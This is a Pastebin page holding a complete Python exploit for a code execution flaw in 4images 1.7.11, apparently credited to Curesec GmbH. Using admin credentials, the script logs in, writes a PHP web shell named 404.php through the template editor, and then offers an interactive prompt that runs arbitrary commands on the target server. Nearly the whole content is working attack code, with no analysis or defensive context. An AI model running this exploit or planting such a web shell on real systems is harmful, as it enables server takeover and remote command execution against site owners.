API tools faq
paste
Advertisement
3xploit3r

4images 1.7.11 Code Execution

3xploit3r
Aug 12th, 2016
170
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.14 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/local/bin/python
  2. # Exploit for 4images 1.7.11 Code Execution vulnerability
  3. # An admin account is required to use this exploit
  4. # Curesec GmbH
  5.  
  6. import sys
  7. import re
  8. import argparse
  9. import requests # requires requests lib
  10.  
  11. parser = argparse.ArgumentParser()
  12. parser.add_argument("url", help="base url to vulnerable site")
  13. parser.add_argument("username", help="admin username")
  14. parser.add_argument("password", help="admin password")
  15. args = parser.parse_args()
  16.  
  17. url = args.url
  18. username = args.username
  19. password = args.password
  20.  
  21. loginPath = "/admin/index.php"
  22. fileManagerPath = "/admin/templates.php"
  23.  
  24. shellFileName = "404.php"
  25. shellContent = "<?php passthru($_GET['x']); ?>"
  26.  
  27. def login(requestSession, url, username, password):
  28. csrfRequest = requestSession.get(url)
  29. csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
  30. csrfToken = csrfTokenRegEx.group(1)
  31.  
  32. postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password}
  33. loginResult = requestSession.post(url, data = postData).text
  34. return "loginpassword" not in loginResult
  35.  
  36. def upload(requestSession, url, fileName, fileContent):
  37. csrfRequest = requestSession.get(url)
  38. csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
  39. csrfToken = csrfTokenRegEx.group(1)
  40.  
  41. postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"}
  42. loginResult = requestSession.post(url, data = postData).text
  43.  
  44. def runShell(url):
  45. print("enter command, or enter exit to quit.")
  46. command = raw_input("$ ")
  47. while "exit" not in command:
  48. print(requests.get(url + command).text)
  49. command = raw_input("$ ")
  50.  
  51. requestSession = requests.session()
  52.  
  53. if login(requestSession, url + loginPath, username, password):
  54. print("successful: login")
  55. else:
  56. exit("ERROR: Incorrect username or password")
  57.  
  58. upload(requestSession, url + fileManagerPath, shellFileName, shellContent)
  59.  
  60. runShell(url + "/templates/default/" + shellFileName + "?x=")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!